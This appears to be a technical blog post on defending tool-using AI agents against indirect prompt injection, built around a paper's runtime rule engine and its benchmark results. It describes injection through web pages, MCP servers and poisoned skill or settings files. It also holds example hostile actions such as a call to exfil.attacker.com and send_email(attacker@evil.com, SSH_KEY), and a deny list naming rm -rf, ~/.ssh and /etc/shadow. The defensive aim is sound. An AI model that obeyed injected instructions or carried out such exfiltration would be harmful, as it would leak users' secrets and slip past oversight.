12 minute read


Why the prompt layer is the wrong place to defend


A brass valve with one inlet port sealed by a red safety interlock while others remain open, representing deterministic gating at each tool-call boundary

TL;DR. ClawGuard (arXiv 2604.11790, April 2026) drops AgentDojo indirect-injection attack success rate from 0.6–3.1% to 0.0%, and MCPSafeBench from 36.5–46.1% to 7.1–11.2%, by enforcing user-derived constraints at every tool-call boundary rather than filtering prompts. The shift matters: an attacker now has to bypass both the LLM and a deterministic rule engine. If your prompt injection defense lives entirely inside the prompt, you are guarding the wrong layer (see why prompt injection detection is already broken).


Why the prompt layer is the wrong place to defend

You can spend the next quarter tuning Azure Prompt Shield, Meta Prompt Guard, and a regex pipeline on top of both. A 2026 paper showed six commercial detectors can be evaded at up to 100% success rate using character injection and adversarial ML (arXiv 2504.11168). A systematization-of-knowledge study came to the same conclusion by a different route: no category of guardrail reliably stops prompt injection (arXiv 2506.10597). This is not a tuning problem. It is a layer problem.

The prompt layer is where the attacker wants the fight. Detectors read tokens. LLMs read tokens. Whatever transformation fools the detector but keeps meaning for the LLM wins, and that gap is what attackers optimize against. Runtime enforcement changes the arena: the attacker still has to manipulate tokens to move the LLM, but the damage (a tool call to exfil.attacker.com, a write to /etc/passwd, a shell exec) happens outside the token stream. That is where a deterministic rule engine can stand.

Simon Willison’s framing from 2023 still holds: the only defenses we trust are the ones that do not rely on the LLM getting it right. ClawGuard is the 2026 version of that bet, applied at the tool-call boundary.

What ClawGuard actually enforces

ClawGuard (Wei Zhao, Zhe Li, Peixin Zhang, Jun Sun; arXiv 2604.11790) is a runtime framework that sits between the agent and its tools. Before the agent calls anything external, ClawGuard has already built a rule set for the session, presented it to the user for review, and locked it in. Every subsequent tool call is checked against that rule set.

The rule set has two parts:

  • Baseline rules (ℛ_base). Non-negotiable security invariants: deny shell rm -rf /, deny writes to ~/.ssh, deny network calls to private IP ranges, deny read of /etc/shadow. These load before the user’s task is known.
  • Task rules (ℛ_task). Induced by the LLM from the user’s stated objective before any external tool runs. For “summarize the latest issues in my repo”, the induced rules whitelist the repo’s git domain and working directory and blacklist every other network destination and path. The user sees this rule set and can edit it.

The critical detail is ordering. Rule induction happens before the agent reads any tool output, which means untrusted content cannot contaminate the rules themselves. A malicious web page cannot quietly add attacker.com to the whitelist because by the time the agent sees the page, the whitelist is already sealed.

At each tool-call boundary, four components run:

Component What it does Failure mode without it
Content Sanitizer Redacts credentials, API keys, SSH keys from arguments and returns via regex/glob Secrets leak to tools or to the model’s context window
Rule Evaluator Checks tool invocations, file paths, and network destinations against ℛ Agent calls send_email(attacker@evil.com, SSH_KEY) and it just runs
Skill Inspector LLM-judge risk scores each skill; user confirms before first use Skill files smuggle behavioral directives with no gate
Approval Mechanism Ambiguous calls route to a human; every event is logged Silent escalation, no audit trail

The Rule Evaluator returns three verdicts: allow, deny, or ambiguous. Ambiguous routes to the user. This matters because “ambiguous” is where most real systems fail: they either block everything (utility collapses) or allow everything (security collapses). ClawGuard separates the decision.

How the three injection channels actually work

ClawGuard’s threat model names three channels. Each is a live attack surface today.

Channel 1: web and local content injection. The agent reads a web page, a PDF, a search result, or a local file. Adversarial instructions are embedded there. The LLM processes them as if they were user intent. This is the classic indirect prompt injection pattern from the 2023 Greshake paper, now generalized to every tool that returns untrusted text.

Channel 2: MCP server injection. A compromised or malicious Model Context Protocol server does one of two things: embeds instructions in any returned content (same as Channel 1 but harder to audit because MCP servers are remote), or poisons tool description metadata so that the agent’s tool-selection logic is manipulated before a single query runs. Anthropic’s own Git MCP server had three CVEs in January 2026 (CVE-2025-68143/68144/68145) that enabled arbitrary file access and RCE through exactly this pattern.

Channel 3: skill file injection. Skills (the Claude Code and Copilot Extensions model) combine natural-language behavioral directives, tool invocation templates, and capability descriptions in a single config file. A malicious skill is effectively a persistent, structured prompt injection with tool privileges attached. On February 25, 2026, Check Point disclosed a Claude Code issue where a poisoned .claude/settings.json hook achieved RCE the moment a developer opened the repository.

flowchart LR
    U[User objective] --> RI[Rule induction LLM]
    RI --> RR[Raw rules]
    RR --> UC[User review]
    UC --> R[Locked rule set R]

    subgraph Runtime
    A[Agent] --> TC[Tool call]
    TC --> CS[Content Sanitizer]
    CS --> RE[Rule Evaluator]
    RE -->|allow| T[Tool executes]
    RE -->|deny| X[Block + log]
    RE -->|ambiguous| AP[User approval]
    T --> A
    end

    R -.-> RE
    W[Web / local / MCP / skill] -.->|untrusted content| T

    style X fill:#b71c1c,color:#fff
    style R fill:#1b5e20,color:#fff
    style W fill:#7b1fa2,color:#fff

All three channels share a property: the hostile signal enters the LLM’s context through a tool, and the damage happens through another tool call. That geometry is why tool-boundary enforcement catches them all with one mechanism.

The numbers that matter

ClawGuard evaluates on three benchmarks across five LLMs. Here is what changes.

Benchmark Tasks/model Baseline ASR With ClawGuard Utility retained
AgentDojo 160 0.6–3.1% 0.0% 98.1–100% completion
SkillInject 84 26–48% 4.8–14% 50–84% relative ASR drop
MCPSafeBench 215 36.5–46.1% 7.1–11.2% 82.0–86.8% completion

Two observations. First, AgentDojo baseline numbers look low because most frontier agents have decent passive resistance to AgentDojo’s attacks; ClawGuard closes the remaining gap to zero. For context, PromptArmor reports 0–0.47% on AgentDojo using a guardrail LLM (arXiv 2510.05244), and CaMeL reports 67% attack neutralization with 77% task completion (arXiv 2503.18813). ClawGuard lands the perfect AgentDojo number while keeping completion at 98%+ without the dual-LLM overhead.

Second, the MCPSafeBench numbers are the more important story. MCP-server injection baselines sit in the 36–46% range. That is what unguarded agents look like against compromised tool servers. ClawGuard brings that down by roughly 4x, which is the right order of magnitude for a defense that should not be the only layer. The residual 7–11% is exactly the place to stack a second control.

ClawGuard also tracks an Implicit Resistance Rate: the fraction of defense outcomes that are explicit refusals versus probabilistic model resistance. Without ClawGuard, only 9–16% of survived attacks are explicit refusals. The rest are silent luck. That number is why security teams are nervous about “model-level” defenses: you cannot audit what you cannot observe.

What this means for your architecture

If you are building a tool-augmented agent in 2026, the honest architectural position is that your LLM will be prompt-injected. The question is what that does to the system.

Stop treating detectors as the gate. An input classifier is a signal, not a barrier. It belongs in the telemetry pipeline and the WAF, not in the critical path. Defense in depth for LLM applications gives the layer map.

Make the tool boundary the gate. Every tool call goes through a rule engine that evaluates:

  1. Is the destination (URL, file path, command) in the session whitelist?
  2. Are the arguments free of sanitizable secrets?
  3. Does this call’s side-effect class match the trust level of whatever caused it?

This is independent of what the LLM thinks it is doing. It is the iptables of agents.

Derive constraints from the user’s task, not from a static policy. A static policy that covers every tool an agent might call is either too loose or too tight. Task-scoped rules, induced once before tool execution, give you the right window of permission for the current session only.

Confirm rules before execution, log every decision. The “user-confirmed rule set” is not ceremony; it is the audit trail. Compliance auditors (see how to evaluate an LLM system you did not build) want a record of what was allowed, denied, and overridden. Runtime enforcement produces that record naturally; prompt-layer detection does not.

Accept that residual risk stays non-zero. ClawGuard’s residual SkillInject rate (4.8–14%) is not a failure; it is the honest floor for context-dependent attacks where damage happens inside generated text rather than through an explicit side-effect. Pair it with output-level checks (markdown rendering sanitization, data-exfiltration monitors), not with more input detectors.

Where runtime enforcement fits in the broader defense stack

ClawGuard is not a standalone answer. It is one layer in a multi-layer stack that is starting to look coherent in 2026.

Layer Examples What it catches
Input detection Azure Prompt Shield, Meta Prompt Guard Obvious injection text (fails on adaptive attacks)
Privilege separation CaMeL (dual LLM + sandboxed interpreter) Control-flow hijacking via untrusted data
Runtime tool enforcement ClawGuard Disallowed side-effects at the tool boundary
Causal attribution AttriGuard Tool calls caused by untrusted content, not user intent
Behavioral monitoring AgentWatcher, trajectory analyzers Patterns that look like multi-step exfiltration
Post-hoc output sanitization Markdown renderers, URL rewriters Exfiltration via generated links/images

The defense stack post covers the neighboring layers. ClawGuard slots into Layer 3, the enforcement boundary between “the LLM decided to do X” and “X actually happens”. Miss this layer and the four layers on either side of it are doing work they were not designed for.

A blunt framing: if your agent reads untrusted content and has tools, and you do not have a deterministic rule engine between the two, your defense stack has a hole the exact shape of the OWASP LLM01 problem. ClawGuard is open source. The cost of the missing layer is higher than the cost of adding it.

What to do on Monday

Three moves that do not require waiting for your vendor.

  1. Inventory your tool surface. Which tools can make outbound network calls? Which can write to disk or run commands? Which read untrusted content (web, email, issue trackers, MCP servers)? Mark any tool that appears in both lists as “high-risk”; those are the calls you need a rule engine around.
  2. Write a baseline rule set. No LLM involved. Hard blocks: no rm -rf, no writes outside the working tree, no private-IP network destinations, no SSH key reads, no .env reads. This is 20 rules you can write in an afternoon and it will prevent more damage than any detector upgrade.
  3. Add a task-scoped derivation step. For each user session, derive the additional URLs, paths, and commands the task actually needs. Present it to the user. Lock it in. Every tool call that falls outside this set, and outside the baseline allowlist, is denied or escalated. If this sounds like work, that is because your current architecture was quietly relying on the LLM to do this work, badly.

None of this requires ClawGuard itself. Clone the ClawGuard repo if you want a reference implementation; build your own if you have opinions about rule DSLs. Either way, move the gate. The prompt layer is not where this fight is won.

Key takeaways

  • Prompt-layer detection is losing to adaptive attacks. Runtime tool-boundary enforcement gives attackers a second lock to pick.
  • ClawGuard gets AgentDojo ASR to 0.0% and MCPSafeBench ASR down roughly 4x, while keeping completion above 82%.
  • The architectural pattern is task-scoped rules, induced before tool use, enforced deterministically at each call, with ambiguous decisions routed to humans.
  • The three channels that actually matter in 2026 (web/local content, MCP servers, skill files) are all caught by the same mechanism because their damage always exits through a tool call.
  • Runtime enforcement is one layer, not the whole stack. Pair it with privilege separation, causal attribution, and output sanitization.

Further reading